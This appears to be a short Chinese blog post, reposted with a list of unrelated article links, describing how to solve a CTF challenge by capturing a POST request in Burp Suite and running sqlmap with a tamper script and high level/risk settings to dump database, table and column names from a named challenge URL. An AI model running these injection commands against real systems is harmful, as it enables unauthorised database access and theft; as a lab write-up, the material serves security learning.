利用burpsite和sqlmap进行post注入
来源:互联网 发布:mac安装windows系统 编辑:程序博客网 时间:2024/05/18 06:23
尝试用burpsite和sqlmap进行自动post注入,目标(一道题目)
http://120.24.86.145:8002/chengjidan/
第一步 用burpsite抓包并保存成txt
第二步 用sqlmap语句
sqlmap -r 保存的txt文件 -p 需要注入的变量
然后我们的注入语句为
python sqlmap.py -r C:\Users\Assassin\Desktop\input.txt -p id --dbs
但是会报错
第三步 用sqlmap根据题目补充
因为缺少东西我们根据提示补充,最后为
python sqlmap.py -r C:\Users\Assassin\Desktop\input.txt -p id --dbs --tamper=space2comment --level 5 --risk 3
就成功了
这个题目就不多讲,剩下的报表
python sqlmap.py -r C:\Users\Assassin\Desktop\input.txt -p id --tables --tamper=space2comment --level 5 --risk 3
爆列
python sqlmap.py -r C:\Users\Assassin\Desktop\input.txt -p id --columns --tamper=space2comment --level 5 --risk 3
阅读全文
0 0
- 利用burpsite和sqlmap进行post注入
- 利用SQLMap进行cookie注入
- Sqlmap的POST注入
- sqlmap---post----注入
- sqlmap的POST注入
- sqlmap post注入
- 使用Burpsuite辅助Sqlmap进行POST注入测试
- sqlmap使用post方法对cookie进行注入
- 使用SQLMAP对网站和数据库进行SQL注入攻击
- 使用sqlmap进行sql注入
- 使用sqlmap进行sql注入
- 利用sqlmap注入的常规步骤
- 使用sqlmap 绕过防火墙进行注入测试
- 使用sqlmap 绕过防火墙进行注入测试
- 使用sqlmap 绕过防火墙进行注入测试
- sqlmap之(六)----POST登陆框注入实战
- SQLMAP渗透笔记之POST登陆框注入
- 利用Javascript进行注入
- Uncaught Error: Bootstrap's JavaScript requires jQuery
- MySQL 水平拆分
- Linux中rz和sz命令的安装及使用
- 原码和反码及补码之间关系
- python、scala、java分别实现在spark上实现WordCount
- 利用burpsite和sqlmap进行post注入
- How to list all tags of a docker image
- 三层登录实例总结
- 在线编程(三)
- 微信密码框提示下载并安装安全控件
- jQuery源码中的“new jQuery.fn.init()”什么意思?
- LPCXpresso生成bin文件的方法及一些命令设置(图文并貌)----自己加备注!!!
- 经典vim插件功能说明、安装方法和使用方法介绍
- 虚拟机下安装tensorflow